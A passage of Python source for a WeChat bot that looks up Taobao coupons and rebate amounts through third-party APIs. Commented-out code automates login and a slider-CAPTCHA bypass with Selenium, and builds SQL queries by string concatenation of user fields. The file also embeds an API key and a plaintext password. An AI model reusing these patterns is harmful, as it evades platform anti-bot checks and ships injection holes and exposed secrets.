config.read('config.conf',encoding="utf-8-sig")
class Alimama:
def __init__(self, logger, bot):
if config.get('SYS', 'tb') == 'yes':
self.se = requests.session()
self.se.keep_alive = False
# self.load_cookies()
# self.myip = "127.0.0.1"
# self.start_keep_cookie_thread()
self.logger = logger
self.ort = Orther()
self.movie = SharMovie()
self.bot2 = bot
# 加密方法
# def encrypt_oracle(self, value):
# a = ''
# for i in value:
# a = a + str(ord(i)) + '**'
#
# return a
def getTao(self, bot, msg, raw):
if config.get('SYS', 'tb') == 'no':
text = '''
一一一一系统信息一一一一
机器人在升级中, 暂不支持淘宝商品查询
'''
return text
try:
# q = re.search(r'【.*】', msg['Text']).group().replace(u'【', '').replace(u'】', '')
# if u'打开👉天猫APP👈' in msg['Text']:
# try:
# url = re.search(r'http://.* \)', msg['Text']).group().replace(u' )', '')
# except:
# url = None
#
# else:
# try:
# url = re.search(r'http://.* ,', msg['Text']).group().replace(u' ,', '')
# except:
# url = None
# if url is None:
# taokoulingurl = 'http://www.taokouling.com/index.php?m=api&a=taokoulingjm'
# if '《' in msg['Text']:
# taokouling = re.search(r'《.*?《', msg['Text']).group()
# elif '¥' in msg['Text']:
# taokouling = re.search(r'¥.*?¥', msg['Text']).group()
# elif '€' in msg['Text']:
# taokouling = re.search(r'€.*?€', msg['Text']).group()
# parms = {'username': 'wx_tb_fanli', 'password': 'wx_tb_fanli', 'text': taokouling}
# res = requests.post(taokoulingurl, data=parms)
# url = res.json()['url'].replace('https://', 'http://')
# real_url = self.get_real_url(url)
#
# res = self.get_detail(bot, real_url, raw)
# 获取淘口令
taokoulin = ''
if '《' in msg['Text']:
taokouling = re.search(r'《.*?《', msg['Text']).group()
elif '¥' in msg['Text']:
taokouling = re.search(r'¥.*?¥', msg['Text']).group()
elif '€' in msg['Text']:
taokouling = re.search(r'€.*?€', msg['Text']).group()
# res = requests.get('http://api.hitui.net/Kl_Query?appkey=JoB3RIns&content=' + taokouling)
res = self.se.get('http://tuijian.ptjob.net/phpsdk/sdkList/taobao_wireless_share_tpwd_query.php?str=' + taokouling)
resj = json.loads(res.text)
id = ''
urlToToken=''
if 'https://item.taobao.com' in resj['url']:
potten2 = resj['url'].split('&id=')
id = potten2[1].split('&sourceType')[0]
else:
potten = resj['url'].split('https://a.m.taobao.com/i')
id = potten[1].split('.htm')[0]
url3 = 'http://api.hitui.net/privilege?type=1&appkey=JoB3RIns&id=%s&pid=%s&session=%s' % (id, config.get('SYS', 'PID'), config.get('SYS', 'SESSION'))
print(url3)
# 获取优惠券链接
datares = self.se.get(url3)
coupon_link = json.loads(datares.text)
if 'tbk_privilege_get_response' not in coupon_link or 'coupon_info' not in json.dumps(coupon_link):
# 推荐链接
tui_url = 'http://tuijian.ptjob.net/www/public/index.html%23/index/' + id
shortUrl = self.movie.getShortUrl(tui_url)
text = '''
一一一一 返利信息 一一一一
亲,当前商品优惠券已领完,为您精选如下优惠券商品
精选好券:'''+shortUrl+'''
'''
return text
coupon_link = json.loads(datares.text)['tbk_privilege_get_response']['result']['data']
# 获取优惠券金额
coupon_price = coupon_link['coupon_info'].split('减')[1].split('元')[0]
ress=self.se.get('http://tuijian.ptjob.net/phpsdk/sdkList/taobao_tbk_tpwd_create.php?title='+resj['content']+'&counp_link='+coupon_link['coupon_click_url']+'&image_link='+resj['pic_url'], headers={'Connection':'close'})
# 优惠券链接转淘口令
urlToToken = json.loads(ress.text)['data']['model']
# 红包:券后价 * 佣金比例 / 100
fx = round((round((float(resj['price']) - int(coupon_price)) * float(coupon_link['max_commission_rate']), 2) / 100) * float(config.get('BN', 'bn3t')), 2)
# 更换符号
tu = {0: '🗝', 1: '📲', 2: '🎵'}
n = random.randint(0, 2)
tao_token = urlToToken.replace(urlToToken[:1], tu[n])
tao_token = tao_token.replace(tao_token[-1:], tu[n])
res_text = '''
一一一一返利信息一一一一
【商品名】%s
【淘宝价】%s元
【优惠券】%s元
【返红包】%.2f元
【淘链接】%s
获取返红包步骤:
1,复制本条消息打开淘宝领券
2,下完单后复制订单号发给我
''' % (resj['content'], resj['price'], coupon_price, fx, tao_token)
return res_text
# if res == 'no match item':
# text = '''
# 一一一一 返利信息 一一一一
#
# 亲,当前商品暂无优惠券,建议您换一个商品试试呢
#
# 京东优惠券商城:
# '''+config.get('URL', 'jdshop')+'''
# 淘宝优惠券商城:
# '''+config.get('URL', 'tbshop')+'''
# 邀请好友得返利说明:
# '''+config.get('URL', 'lnvit')+'''
# '''
# return text
#
# auctionid = res['auctionId']
# coupon_amount = res['couponAmount']
# price = res['zkPrice']
#
# # 佣金
# yongjin = price - coupon_amount
# if config.get('SYS', 'isHighServant') == 'yes':
# fx2 = round((yongjin * float(res['tkRate']) / 100) * float(config.get('BN', 'bn3t')), 2)
# else:
# fx2 = round((yongjin * float(res['tkCommonRate']) / 100) * float(config.get('BN', 'bn3t')), 2)
# real_price = round(price - coupon_amount, 2)
# res1 = self.get_tk_link(auctionid)
# tu = {0: '🗝', 1: '📲', 2: '🎵'}
# n = random.randint(0, 2)
# tao_token = res1['taoToken'].replace(res1['taoToken'][:1], tu[n])
# tao_token = tao_token.replace(tao_token[-1:], tu[n])
# # asciistr2 = self.encrypt_oracle(tao_token)
# # longurl2 = 'http://txq.ptjob.net/goodCouponToken?value=' + asciistr2 + 'image=' + res['pictUrl'] + 'title=' + res['title'] + 'coupon_url=' + res1['clickUrl']
# # shorturl2 = self.movie.getShortUrl(longurl2)
#
# coupon_link = res1['couponLink']
# if coupon_link != "":
# coupon_token = res1['couponLinkTaoToken'].replace(res1['couponLinkTaoToken'][:1], tu[n])
# coupon_token = coupon_token.replace(coupon_token[-1:], tu[n])
# # asciistr = self.encrypt_oracle(coupon_token)
# # longurl = 'http://txq.ptjob.net/goodCouponToken?value='+asciistr + 'image=' + res['pictUrl'] + 'title=' + res['title'] + 'coupon_url=' + res1['couponLink']
# # shorturl = self.movie.getShortUrl(longurl)
# res_text = '''
# 一一一一返利信息一一一一
#
# 【商品名】%s元
#
# 【淘宝价】%s元
# 【优惠券】%s元
# 【券后价】%s元
# 【返红包】%.2f元
# 【淘链接】%s
#
# 获取返红包步骤:
# 1,复制本条消息打开淘宝领券
# 2,下完单后复制订单号发给我
# ''' % (q, price, coupon_amount, real_price, fx2, coupon_token)
# else:
# res_text = '''
# 一一一一返利信息一一一一
#
# 【商品名】%s
# 【淘宝价】%s元
# 【返红包】%.2f元
# 【淘链接】%s
#
# 获取返红包步骤:
# 1,复制本条消息打开淘宝领券
# 2,下完单后复制订单号发给我
# ''' % (q, price, fx2, tao_token)
# return res_text
except Exception as e:
trace = traceback.format_exc()
print("error:{},trace:{}".format(str(e), trace))
info = '''
一一一一 返利信息 一一一一
亲,当前商品暂无优惠券,建议您换一个商品试试呢,您也可以在下边的优惠券商城中查找哦
京东优惠券商城:
'''+config.get('URL', 'jdshop')+'''
淘宝优惠券商城:
'''+config.get('URL', 'tbshop')+'''
邀请好友得返利说明:
'''+config.get('URL', 'lnvit')+'''
'''
return info
def getGroupTao(self, raw, bot, msg):
if config.get('SYS', 'tb') == 'no':
text = '''
一一一一系统信息一一一一
机器人在升级中, 暂不支持淘宝商品查询
'''
return text
try:
# q = re.search(r'【.*】', msg['Text']).group().replace(u'【', '').replace(u'】', '')
# if u'打开👉天猫APP👈' in msg['Text']:
# try:
# url = re.search(r'http://.* \)', msg['Text']).group().replace(u' )', '')
# except:
# url = None
#
# else:
# try:
# url = re.search(r'http://.* ,', msg['Text']).group().replace(u' ,', '')
# except:
# url = None
#
# if url is None:
# taokoulingurl = 'http://www.taokouling.com/index.php?m=api&a=taokoulingjm'
# if '《' in msg['Text']:
# taokouling = re.search(r'《.*?《', msg['Text']).group()
# elif '¥' in msg['Text']:
# taokouling = re.search(r'¥.*?¥', msg['Text']).group()
# elif '€' in msg['Text']:
# taokouling = re.search(r'€.*?€', msg['Text']).group()
# parms = {'username': 'wx_tb_fanli', 'password': 'wx_tb_fanli', 'text': taokouling}
# res = requests.post(taokoulingurl, data=parms)
# url = res.json()['url'].replace('https://', 'http://')
#
# real_url = self.get_real_url(url)
#
# res = self.get_group_detail(bot, real_url, raw)
# if res == 'no match item':
# text = '''
# 一一一一 返利信息 一一一一
#
# 亲,当前商品暂无优惠券,建议您换一个商品试试呢
#
#
# 京东优惠券商城:
# '''+config.get('URL', 'jdshop')+'''
# 淘宝优惠券商城:
# '''+config.get('URL', 'tbshop')+'''
# 邀请好友得返利说明:
# '''+config.get('URL', 'lnvit')+'''fdasfsf
# '''
# return text
#
# auctionid = res['auctionId']
# coupon_amount = res['couponAmount']
# price = res['zkPrice']
# # 佣金
# yongjin = price - coupon_amount
# if config.get('SYS', 'isHighServant') == 'yes':
# fx2 = round((yongjin * float(res['tkRate']) / 100) * float(config.get('BN', 'bn3t')), 2)
# else:
# fx2 = round((yongjin * float(res['tkCommonRate']) / 100) * float(config.get('BN', 'bn3t')), 2)
# real_price = round(price - coupon_amount, 2)
# res1 = self.get_tk_link(auctionid)
#
# # tao_token = res1['taoToken']
# # asciistr2 = self.encrypt_oracle(tao_token)
# #
# # longurl2 = 'http://txq.ptjob.net/goodCouponToken?value=' + asciistr2 + 'image=' + res[
# # 'pictUrl'] + 'title=' + res['title'] + 'coupon_url=' + res1['clickUrl']
# # shorturl2 = self.movie.getShortUrl(longurl2)
#
# tu = {0: '🗝', 1: '📲', 2: '🎵'}
# n = random.randint(0, 2)
# tao_token = res1['taoToken'].replace(res1['taoToken'][:1], tu[n])
# tao_token = tao_token.replace(tao_token[-1:], tu[n])
#
# coupon_link = res1['couponLink']
# if coupon_link != "":
# # coupon_token = res1['couponLinkTaoToken']
# # asciistr = self.encrypt_oracle(coupon_token)
# # longurl = 'http://txq.ptjob.net/goodCouponToken?value=' + asciistr + 'image=' + res[
# # 'pictUrl'] + 'title=' + res['title'] + 'coupon_url=' + res1['couponLink']
# # shorturl = self.movie.getShortUrl(longurl)
# coupon_token = res1['couponLinkTaoToken'].replace(res1['couponLinkTaoToken'][:1], tu[n])
# coupon_token = coupon_token.replace(coupon_token[-1:], tu[n])
#
# res_text = '''
# 一一一一淘宝返利信息一一一一
#
# 【商品名】%s元
#
# 【淘宝价】%s元
# 【优惠券】%s元
# 【券后价】%s元
# 【返红包】%.2f元
# 【淘链接】%s
#
# 获取返红包步骤:
# 1,复制本条消息打开淘宝领券
# 2,点击头像添加机器人为好友
# 3,下完单后复制订单号发给我
# ''' % (q, price, coupon_amount, real_price, fx2, coupon_token)
# else:
# res_text = '''
# 一一一一淘宝返利信息一一一一
#
# 【商品名】%s
# 【淘宝价】%s元
# 【返红包】%.2f元
# 【淘链接】%s
#
# 获取返红包步骤:
# 1,复制本条消息打开淘宝领券
# 2,点击头像添加机器人为好友
# 3,下完单后复制订单号发给我
# ''' % (q, price, fx2, tao_token)
# return res_text
# 获取淘口令
taokoulin = ''
if '《' in msg['Text']:
taokouling = re.search(r'《.*?《', msg['Text']).group()
elif '¥' in msg['Text']:
taokouling = re.search(r'¥.*?¥', msg['Text']).group()
elif '€' in msg['Text']:
taokouling = re.search(r'€.*?€', msg['Text']).group()
res = self.se.get('http://tuijian.ptjob.net/phpsdk/sdkList/taobao_wireless_share_tpwd_query.php?str=' + taokouling, headers={'Connection':'close'})
resj = json.loads(res.text)
id = ''
urlToToken=''
if 'https://item.taobao.com' in resj['url']:
potten2 = resj['url'].split('&id=')
id = potten2[1].split('&sourceType')[0]
else:
potten = resj['url'].split('https://a.m.taobao.com/i')
id = potten[1].split('.htm')[0]
# 获取优惠券链接
datares = self.se.get('http://api.hitui.net/privilege?type=1&appkey=JoB3RIns&id=%s&pid=%s&session=%s' % (id, config.get('SYS', 'PID'), config.get('SYS', 'SESSION')), headers={'Connection':'close'})
coupon_link = json.loads(datares.text)
if 'tbk_privilege_get_response' not in coupon_link or 'coupon_info' not in json.dumps(coupon_link):
# 推荐链接
tui_url = 'http://tuijian.ptjob.net/www/public/index.html%23/index/' + id
text = '''
一一一一 返利信息 一一一一
亲,当前商品优惠券已领完,为您精选如下优惠券商品
精选好券:'''+tui_url+'''
'''
return text
coupon_link = json.loads(datares.text)['tbk_privilege_get_response']['result']['data']
# 获取优惠券金额
coupon_price = coupon_link['coupon_info'].split('减')[1].split('元')[0]
ress=self.se.get('http://tuijian.ptjob.net/phpsdk/sdkList/taobao_tbk_tpwd_create.php?title='+resj['content']+'&counp_link='+coupon_link['coupon_click_url']+'&image_link='+resj['pic_url'], headers={'Connection':'close'})
# 优惠券链接转淘口令
urlToToken = json.loads(ress.text)['data']['model']
# 红包:券后价 * 佣金比例 / 100
fx = round((round((float(resj['price']) - int(coupon_price)) * float(coupon_link['max_commission_rate']), 2) / 100) * float(config.get('BN', 'bn3t')), 2)
# 更换符号
tu = {0: '🗝', 1: '📲', 2: '🎵'}
n = random.randint(0, 2)
tao_token = urlToToken.replace(urlToToken[:1], tu[n])
tao_token = tao_token.replace(tao_token[-1:], tu[n])
res_text = '''
一一一一返利信息一一一一
【商品名】%s
【淘宝价】%s元
【优惠券】%s元
【返红包】%.2f元
【淘链接】%s
获取返红包步骤:
1,复制本条消息打开淘宝领券
2,点击头像添加机器人为好友
3,下完单后复制订单号发给我
''' % (resj['content'], resj['price'], coupon_price, fx, tao_token)
return res_text
except Exception as e:
trace = traceback.format_exc()
print("error:{},trace:{}".format(str(e), trace))
info = '''
一一一一 返利信息 一一一一
亲,当前商品暂无优惠券,建议您换一个商品试试呢。
京东优惠券商城:
'''+config.get('URL', 'jdshop')+'''
淘宝优惠券商城:
'''+config.get('URL', 'tbshop')+'''
邀请好友得返利说明:
'''+config.get('URL', 'lnvit')+'''
'''
return info
# 启动一个线程,定时访问淘宝联盟主页,防止cookie失效
# def start_keep_cookie_thread(self):
# t = Thread(target=self.visit_main_url, args=())
# t.setDaemon(True)
# t.start()
#
# def start_keep_get_order(self, bot):
# t = Thread(target=self.getOrderInfo, args=(bot,))
# t.setDaemon(True)
# t.start()
#
# def visit_main_url(self):
# url = "https://pub.alimama.com/"
# headers = {
# 'method': 'GET',
# 'authority': 'pub.alimama.com',
# 'scheme': 'https',
# 'path': '/common/getUnionPubContextInfo.json',
# 'Accept': 'application/json, text/javascript, */*; q=0.01',
# 'X-Requested-With': 'XMLHttpRequest',
# 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:59.0) Gecko/20100101 Firefox/59.0',
# 'Referer': 'http://pub.alimama.com/',
# 'Accept-Encoding': 'gzip, deflate, sdch',
# 'Accept-Language': 'zh,en-US;q=0.8,en;q=0.6,zh-CN;q=0.4,zh-TW;q=0.2',
# }
# while True:
# time.sleep(60 * 5)
# try:
# self.get_url(url, headers)
# real_url = "https://detail.tmall.com/item.htm?id=42485910384"
# res = self.get_detail2(real_url)
# print('淘宝登录验证.....', res)
# except Exception as e:
# # 给管理员发送登录过期消息
# adminuser = self.bot2.friends().search(config.get('ADMIN', 'ADMIN_USER'))[0]
# text = '''
# ---------- 系统提醒 ----------
#
# 机器人【%s】, 淘宝登录失效
# ''' % (self.bot2.self.nick_name)
# adminuser.send(text)
# trace = traceback.format_exc()
# self.logger.warning("error:{},trace:{}".format(str(e), trace))
#
# # 获取商品详情
# def get_detail2(self, q):
# cm = ConnectMysql()
# try:
# t = int(time.time() * 1000)
# tb_token = self.se.cookies.get('_tb_token_', domain="pub.alimama.com")
# pvid = '10_%s_1686_%s' % (self.myip, t)
# url = 'http://pub.alimama.com/items/search.json?q=%s&_t=%s&auctionTag=&perPageSize=40&shopTag=&t=%s&_tb_token_=%s&pvid=%s' % (
# urllib.quote(q.encode('utf8')), t, t, tb_token, pvid)
# headers = {
# 'method': 'GET',
# 'authority': 'pub.alimama.com',
# 'scheme': 'https',
# 'path': '/items/search.json?%s' % url.split('search.json?')[-1],
# 'accept': 'application/json, text/javascript, */*; q=0.01',
# 'x-requested-with': 'XMLHttpRequest',
# 'user-agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:59.0) Gecko/20100101 Firefox/59.0',
# 'referer': 'https://pub.alimama.com',
# 'accept-encoding': 'gzip, deflate, sdch, br',
# 'accept-language': 'zh,en-US;q=0.8,en;q=0.6,zh-CN;q=0.4,zh-TW;q=0.2',
# }
# res = self.get_url(url, headers)
# rj = res.json()
# if rj['data']['pageList'] != None:
# return rj['data']['pageList'][0]
# else:
# return 'no match item'
# except Exception as e:
# trace = traceback.format_exc()
# self.logger.warning("error:{},trace:{}".format(str(e), trace))
#
# def get_url(self, url, headers):
# res = self.se.get(url, headers=headers)
# return res
#
# def post_url(self, url, headers, data):
# res = self.se.post(url, headers=headers, data=data)
# return res
#
# def load_cookies(self):
# if os.path.isfile(cookie_fname):
# with open(cookie_fname, 'r') as f:
# c_str = f.read().strip()
# self.set_cookies(c_str)
#
# def set_cookies(self, c_str):
# try:
# cookies = json.loads(c_str)
# except:
# return
# for c in cookies:
# self.se.cookies.set(c[0], c[1])
#
# # check login
# def check_login(self):
# url = 'https://pub.alimama.com/common/getUnionPubContextInfo.json'
# headers = {
# 'method': 'GET',
# 'authority': 'pub.alimama.com',
# 'scheme': 'https',
# 'path': '/common/getUnionPubContextInfo.json',
# 'Accept': 'application/json, text/javascript, */*; q=0.01',
# 'X-Requested-With': 'XMLHttpRequest',
# 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:59.0) Gecko/20100101 Firefox/59.0',
# 'Referer': 'http://pub.alimama.com/',
# 'Accept-Encoding': 'gzip, deflate, sdch',
# 'Accept-Language': 'zh,en-US;q=0.8,en;q=0.6,zh-CN;q=0.4,zh-TW;q=0.2',
# }
#
# res = self.get_url(url, headers=headers)
# rj = json.loads(res.text)
# return rj
#
# def visit_login_rediret_url(self, url):
# headers = {
# 'method': 'GET',
# 'authority': 'login.taobao.com',
# 'scheme': 'https',
# 'path': '/member/loginByIm.do?%s' % url.split('loginByIm.do?')[-1],
# 'Accept': 'application/json, text/javascript, */*; q=0.01',
# 'X-Requested-With': 'XMLHttpRequest',
# 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:59.0) Gecko/20100101 Firefox/59.0',
# 'Referer': 'http://pub.alimama.com/',
# 'Accept-Encoding': 'gzip, deflate, sdch',
# 'Accept-Language': 'zh,en-US;q=0.8,en;q=0.6,zh-CN;q=0.4,zh-TW;q=0.2',
# }
# res = self.get_url(url, headers=headers)
# self.logger.debug(res.status_code)
#
# def get_scan_qr_status(self, lg_token):
# defaulturl = 'http://login.taobao.com/member/taobaoke/login.htm?is_login=1'
# url = 'https://qrlogin.taobao.com/qrcodelogin/qrcodeLoginCheck.do?lgToken=%s&defaulturl=%s&_ksTS=%s_30&callback=jsonp31' % (
# lg_token, defaulturl, int(time.time() * 1000))
# headers = {
# 'method': 'GET',
# 'authority': 'qrlogin.taobao.com',
# 'scheme': 'https',
# 'path': '/qrcodelogin/qrcodeLoginCheck.do?%s' % url.split('qrcodeLoginCheck.do?')[-1],
# 'user-agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:59.0) Gecko/20100101 Firefox/59.0',
# 'accept': '*/*',
# 'referer': 'https://login.taobao.com/member/login.jhtml?style=mini&newMini2=true&from=alimama&redirectURL=http%3A%2F%2Flogin.taobao.com%2Fmember%2Ftaobaoke%2Flogin.htm%3Fis_login%3d1&full_redirect=true&disableQuickLogin=true',
# 'accept-encoding': 'gzip, deflate, sdch, br',
# 'accept-language': 'zh,en-US;q=0.8,en;q=0.6,zh-CN;q=0.4,zh-TW;q=0.2',
# }
# res = self.get_url(url, headers=headers)
# rj = json.loads(res.text.replace('(function(){jsonp31(', '').replace(');})();', ''))
# self.logger.debug(rj)
# return rj
#
# def show_qr_image(self):
# self.logger.debug('begin to show qr image')
# url = 'https://qrlogin.taobao.com/qrcodelogin/generateQRCode4Login.do?from=alimama&_ksTS=%s_30&callback=jsonp31' % int(
# time.time() * 1000)
#
# # get qr image
# headers = {
# 'method': 'GET',
# 'authority': 'qrlogin.taobao.com',
# 'scheme': 'https',
# 'path': '/qrcodelogin/generateQRCode4Login.do?%s' % url.split('generateQRCode4Login.do?')[-1],
# 'user-agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:59.0) Gecko/20100101 Firefox/59.0',
# 'accept': '*/*',
# 'referer': 'https://login.taobao.com/member/login.jhtml?style=mini&newMini2=true&from=alimama&redirectURL=http%3A%2F%2Flogin.taobao.com%2Fmember%2Ftaobaoke%2Flogin.htm%3Fis_login%3d1&full_redirect=true&disableQuickLogin=true',
# 'accept-encoding': 'gzip, deflate, sdch, br',
# 'accept-language': 'zh-CN,zh;q=0.8',
# }
#
# res = self.get_url(url, headers=headers)
# rj = json.loads(res.text.replace('(function(){jsonp31(', '').replace(');})();', ''))
# lg_token = rj['lgToken']
# url = 'https:%s' % rj['url']
#
# headers = {
# 'method': 'GET',
# 'authority': 'img.alicdn.com',
# 'scheme': 'https',
# 'path': '/tfscom/%s' % url.split('tfscom/')[-1],
# 'user-agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:59.0) Gecko/20100101 Firefox/59.0',
# 'accept': 'image/webp,image/*,*/*;q=0.8',
# 'referer': 'https://login.taobao.com/member/login.jhtml?style=mini&newMini2=true&from=alimama&redirectURL=http%3A%2F%2Flogin.taobao.com%2Fmember%2Ftaobaoke%2Flogin.htm%3Fis_login%3d1&full_redirect=true&disableQuickLogin=true',
# 'accept-encoding': 'gzip, deflate, sdch, br',
# 'accept-language': 'zh,en-US;q=0.8,en;q=0.6,zh-CN;q=0.4,zh-TW;q=0.2',
# }
# res = self.get_url(url, headers=headers)
# qrimg = BytesIO(res.content)
# self.logger.debug(u"begin qr")
#
# sysstr = platform.system()
# if (sysstr == "Windows"):
# # windows下可能无法打印请用下列代码
# img = Image.open(qrimg)
# img.show()
#
# elif (sysstr == "Linux") or (sysstr == "Darwin"):
# # 读取url
# import zbarlight
# img = Image.open(qrimg)
# codes = zbarlight.scan_codes('qrcode', img)
# qr_url = codes[0]
# # 使用pyqrcode在终端打印,只在linux下可以用
# pyqrcode_url = pyqrcode.create(qr_url)
# self.logger.debug(pyqrcode_url.terminal())
#
# self.logger.debug(u"请使用淘宝客户端扫码")
# return lg_token
#
# def get_qr_image(self):
# url = 'https://qrlogin.taobao.com/qrcodelogin/generateQRCode4Login.do?from=alimama&_ksTS=%s_30&callback=jsonp31' % int(
# time.time() * 1000)
#
# # get qr image
# headers = {
# 'method': 'GET',
# 'authority': 'qrlogin.taobao.com',
# 'scheme': 'https',
# 'path': '/qrcodelogin/generateQRCode4Login.do?%s' % url.split('generateQRCode4Login.do?')[-1],
# 'user-agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:59.0) Gecko/20100101 Firefox/59.0',
# 'accept': '*/*',
# 'referer': 'https://login.taobao.com/member/login.jhtml?style=mini&newMini2=true&from=alimama&redirectURL=http%3A%2F%2Flogin.taobao.com%2Fmember%2Ftaobaoke%2Flogin.htm%3Fis_login%3d1&full_redirect=true&disableQuickLogin=true',
# 'accept-encoding': 'gzip, deflate, br',
# 'accept-language': 'zh-CN,zh;q=0.8',
# }
#
# res = self.get_url(url, headers=headers)
# rj = json.loads(res.text.replace('(function(){jsonp31(', '').replace(');})();', ''))
# lg_token = rj['lgToken']
# url = 'https:%s' % rj['url']
#
# headers = {
# 'method': 'GET',
# 'authority': 'img.alicdn.com',
# 'scheme': 'https',
# 'path': '/tfscom/%s' % url.split('tfscom/')[-1],
# 'user-agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:59.0) Gecko/20100101 Firefox/59.0',
# 'accept': 'image/webp,image/*,*/*;q=0.8',
# 'referer': 'https://login.taobao.com/member/login.jhtml?style=mini&newMini2=true&from=alimama&redirectURL=http%3A%2F%2Flogin.taobao.com%2Fmember%2Ftaobaoke%2Flogin.htm%3Fis_login%3d1&full_redirect=true&disableQuickLogin=true',
# 'accept-encoding': 'gzip, deflate, br',
# 'accept-language': 'zh,en-US;q=0.8,en;q=0.6,zh-CN;q=0.4,zh-TW;q=0.2',
# }
# res = self.get_url(url, headers=headers)
# qrimg = BytesIO(res.content)
# self.logger.debug("TaoBao Login Out!")
# return qrimg
#
# # do login
# def do_login(self):
# self.logger.debug('begin to login')
# # show qr image
# lg_token = self.show_qr_image()
# t0 = time.time()
# while True:
# rj = self.get_scan_qr_status(lg_token)
# # 扫码成功会有跳转
# if 'url' in rj:
# self.visit_login_rediret_url(rj['url'])
# self.logger.debug('login success')
# # self.logger.debug(self.se.cookies)
# with open(cookie_fname, 'w') as f:
# f.write(json.dumps(self.se.cookies.items()))
# return 'login success'
# # 二维码过一段时间会失效
# if time.time() - t0 > 60 * 5:
# self.logger.debug('scan timeout')
# return
# time.sleep(0.5)
#
# def login(self):
# try:
# clr = self.check_login()
# print('Checking login ...............', clr)
# self.myip = clr['data']['ip']
# if 'mmNick' in clr['data']:
# self.logger.debug(u"淘宝已经登录 不需要再次登录")
# return 'login success'
# else:
# dlr = self.open_do_login()
# if dlr is None:
# return 'login failed'
# else:
# return 'login success'
# except Exception as e:
# trace = traceback.format_exc()
# return 'login failed'
#
# def open_do_login(self):
# # loginname = input('请输入淘宝联盟账号:')
# # nloginpwd = input('请输入淘宝联盟密码:')
# #profileDir = "C:\\Users\pengtao\AppData\Local\Mozilla\Firefox\Profiles\\24xolutj.default"
#
# #profile = webdriver.FirefoxProfile(profileDir)
# #print(profile)
# #wd = webdriver.Firefox(profile)
# wd = webdriver.Firefox()
#
# wd.get('http://pub.alimama.com')
#
# time.sleep(20)
#
# #js = "var pass = document.getElementById(\"TPL_password_1\").setAttribute(\"autocomplete\", \"on\")"
#
# #wd.execute_script(js)
# wd.switch_to.frame('taobaoLoginIfr')
# time.sleep(3)
# wd.find_element_by_class_name('login-switch').click()
# time.sleep(3)
# # 输入账号密码
# wd.find_element_by_id('TPL_username_1').send_keys(config.get('TB', 'TB_USERNAME'))
# # 休息3秒
# time.sleep(3)
# # 输入密码
# wd.find_element_by_id('TPL_password_1').send_keys(config.get('TB', 'TB_PASSWORD'))
# # 点击登录按钮
# time.sleep(2)
# while True:
# # 定位滑块元素
# source = wd.find_element_by_xpath("//*[@id='nc_1_n1z']")
# # 定义鼠标拖放动作
# ActionChains(wd).drag_and_drop_by_offset(source, 400, 0).perform()
#
# # 等待JS认证运行,如果不等待容易报错
# time.sleep(2)
#
# text = wd.find_element_by_xpath("//div[@id='nc_1__scale_text']/span")
# # 目前只碰到3种情况:成功(请在在下方输入验证码,请点击图);无响应(请按住滑块拖动);失败(哎呀,失败了,请刷新)
# if text.text.startswith(u'哎呀,出错了,点击'):
# print('滑动失败!Begin to try.....')
# # 这里定位失败后的刷新按钮,重新加载滑块模块
# wd.find_element_by_xpath("//div[@id='havana_nco']/div/span/a").click()
# time.sleep(3)
# continue
# wd.find_element_by_id('J_SubmitStatic').click()
#
# # 判断是否需要验证码
# # time.sleep(10)
#
# # if self.isElementExist(wd, 'J_LoginCheck'):
# # print('验证码存在!睡眠120秒')
# # time.sleep(160)
#
# # self.logger.debug('login success')
# # with open(cookie_fname, 'w') as f:
# # cookies_arr = []
# # for item in wd.get_cookies():
# # cookies_arr.append([item['name'], item['value']])
# #
# # f.write(json.dumps(cookies_arr))
# #
# # wd.quit()
# #
# # return 'login success'
#
# def isElementExist(self, bower, element):
# try:
# bower.find_element_by_id(element)
# return True
# except Exception as e:
# return False
#
# def get_tb_token(self):
# tb_token = None
# for c in self.se.cookies.items():
# if c[0] == '_tb_token_':
# return c[1]
# if tb_token is None:
# return 'test'
#
# # 获取商品详情
# def get_detail(self, bot, q, raw):
# cm = ConnectMysql()
# # 用户第一次查询,修改备注
# query_good = cm.ExecQuery("SELECT * FROM taojin_query_record WHERE puid='" + raw.sender.puid + "' AND bot_puid='" + bot.self.puid + "'")
#
# if query_good == ():
# se = re.compile('^(\d+)_(\d+)_\w_(\d)+$')
# if se.search(raw.sender.remark_name) == None:
# remarkName = self.ort.generateRemarkName(bot)
# split_arr2 = remarkName.split('_')
# new_remark_name2 = '%s%s%s%s%s%s%s' % (split_arr2[0], '_', split_arr2[1], '_', 'B', '_', split_arr2[3])
# bot.core.set_alias(userName=raw.sender.user_name, alias=new_remark_name2)
# cm.ExecNonQuery("UPDATE taojin_user_info SET remarkname = '"+new_remark_name2+"' WHERE puid='" + raw.sender.puid + "' AND bot_puid='" + bot.self.puid + "'")
# else:
# split_arr = raw.sender.remark_name.split('_')
# new_remark_name = '%s%s%s%s%s%s%s' % (split_arr[0], '_', split_arr[1], '_', 'B', '_', split_arr[3])
# bot.core.set_alias(userName=raw.sender.user_name, alias=new_remark_name)
#
# # 修改数据库
# cm.ExecNonQuery("UPDATE taojin_user_info SET remarkname = '"+new_remark_name+"' WHERE puid='" + raw.sender.puid + "' AND bot_puid='" + bot.self.puid + "'")
# try:
# t = int(time.time() * 1000)
# tb_token = self.se.cookies.get('_tb_token_', domain="pub.alimama.com")
# pvid = '10_%s_1686_%s' % (self.myip, t)
# url = 'http://pub.alimama.com/items/search.json?q=%s&_t=%s&auctionTag=&perPageSize=40&shopTag=&t=%s&_tb_token_=%s&pvid=%s' % (
# urllib.quote(q.encode('utf8')), t, t, tb_token, pvid)
# headers = {
# 'method': 'GET',
# 'authority': 'pub.alimama.com',
# 'scheme': 'https',
# 'path': '/items/search.json?%s' % url.split('search.json?')[-1],
# 'accept': 'application/json, text/javascript, */*; q=0.01',
# 'x-requested-with': 'XMLHttpRequest',
# 'user-agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:59.0) Gecko/20100101 Firefox/59.0',
# 'referer': 'https://pub.alimama.com',
# 'accept-encoding': 'gzip, deflate, br',
